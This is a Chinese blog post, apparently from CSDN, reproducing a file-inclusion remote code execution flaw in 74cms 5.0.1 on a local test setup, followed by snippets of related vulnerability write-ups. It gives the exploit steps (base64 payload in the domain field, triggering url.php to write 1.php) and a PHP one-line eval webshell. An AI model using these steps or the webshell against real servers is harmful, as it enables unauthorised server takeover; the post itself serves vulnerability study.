74cms 5.0.1版本文件包含漏洞复现

最新推荐文章于 2023-11-06 21:23:02 发布
最新推荐文章于 2023-11-06 21:23:02 发布
阅读量612 收藏 2
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ANYOUZHEN/article/details/125120122
版权

漏洞成因:由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。

下载地址:

http://www.74cms.com/download/index.html

下载后解压到phpstudy的根目录www里面

输入网址,http://127.0.0.1/upload/install.php

一直点击下一步,输入数据库名称和密码

进入系统

抓个包看看

将包中的domain后面的改成如下

base64里面的是phpinfo经过base64编码后得到的,使用bp上面的编码模块decode

 然后我们点击send进行发包,看到返回后status等于1,说明状态码正常,发包成功

接下来激活这个发包内容,payload:

127.0.0.1/upload/Application/Common/Conf/url.php

打开看看

发现1.php雀食被写进去了

 接下来就是访问1.php了,payload;

127.0.0.1/upload/Application/Common/Conf/1.php

可以看到成功访问phpinfo,说明漏洞存在且被利用wo

我们这次用的是phpinfo,危害不大,如果我们使用一句话木马,就可以造成更大的危害

一句话木马:<?php @eval($_POST['zrtonnn']);?>

将木马用decode改成base64,重复上述操作,即可得到权限

ANYOUZHEN
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
74cms 5.0.1 版本命令执行漏洞复现
不忘初心,护天下安全!
10-20 2188
从整体分析来看,对site_domain的输入,只会使用trim,htmlspecialchars,stripslashes,strip_tags,think_filter这几个函数做过滤,对于执行php代码,写入shell,有影响的只有strip_tags,可以通过编码绕过正常的url.php文件内容如下,从之前的代码可以看出更新域名将更新domain和COOKIE_DOMAIN对应的值,原本的域名为74cms.com,写入到文件中会在最前面加一个.。
74CMS漏洞复现
小小猪的博客
12-01 4161
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 336
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74cms v6.0.48模版注入+文件包含getshell复现
qq_41814777的博客
03-14 5595
漏洞描述 74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码 影响版本 骑士 CMS < 6.0.48 风险等级 高 漏洞环境搭建 74 cms: 74cms_Home_Setup_v6.0.20.zip 系统:ubuntu18.04.5 php环境:php 5.6 系统镜像:http://old-releases.ubuntu.com/releases/ web源码下载:https://www.74cms.com/download/index.html 准备好后直接把源码放到var/
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 713
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
骑士 74CMS V3.4漏洞
weixin_61842894的博客
02-07 799
骑士 74CMS V3.4
74cms 骑士人才系统 v5.0.1 正式版
10-02
74cms_v5.0.1这个压缩包文件包含了该系统的完整安装包,包括必要的PHP文件、数据库配置文件、模板文件以及可能的文档和帮助文件。在部署时,用户需要按照官方提供的安装指南进行操作,包括服务器环境配置、数据库...
74cms5.0.1RCE漏洞环境源码
10-18
74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境
74cms v4.2.X任意文件读取漏洞
09-06
在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全问题,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上任意文件,这可能导致敏感信息泄露,甚至...
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版.zip
07-16
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版 更新日志  新增:后台增加跳转页面 新增:短信预警提醒,方便客户及时充值 新增:企业与个人账号通用 新增:未付费且登录的企业单独呈现,方便追踪客户 新增:...
74CMS_v5.0.1后台RCE分析1
08-03
I函数简介获取变量如果要获取的变量类型是 get、post 或 put,可以统一用 param 变量类型,param 变量类型是框架特有的支持自动判断当前请求类
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
74cms v5.0.1 漏洞复现
p_lang的博客
04-30 3166
一、环境搭建 这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。 1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html 2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。 3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。 OK,
骑士CMS01 74cms v4.2.111 后台getshell漏洞复现
m0_63253040的博客
09-25 3130
先进入网站后台/index.php?然后访问/Application/Home/Conf/config.php。猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码。输入账号aaa回显管理员账号不存在,试试admin。进入后台找到工具=>风格模板=>可用模板,抓包。302跳转登录成功密码就是admin。拉到最下面查看网站cms版本。修改tpl_dir的值为。蚁剑连接找到flag。
74cms前台getshell漏洞
qq_51922767的博客
12-09 987
74cms前台getshell漏洞
74CMS(骑士CMS) 存在SQL注入漏洞(CNVD-2021-43389)
nnn2188185的博客
03-19 1364
74CMS是一款基于ThinkPHP框架二次开发的人才招聘系统。 74CMS 3.2.0版本存在SQL注入漏洞。攻击者利用该漏洞可通过plus/ajax_street.php的x参数注入SQL语句。
74cms -v3.0 存储型xss 分析与复现
最新发布
Au_Wind的博客
11-06 292
骑士cms3.0版本存储型xss分析复现
刷洞2---74cms注入漏洞
river
05-17 2308
基础积累: 1.在我们拿到一套源码的时候,首先需要寻找连接数据库的密码和网站后台的密码。 第一种方法是看文件名,看看有没有明显的config.php global_function.php类似的文件。 第二种方式是全局搜索 &amp;quot;new mysql(&amp;quot; &amp;quot;mysqli_connect(&amp;quot; &amp;quot;new PDO&amp;quot; 这个是php连接数据库的常用操作,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值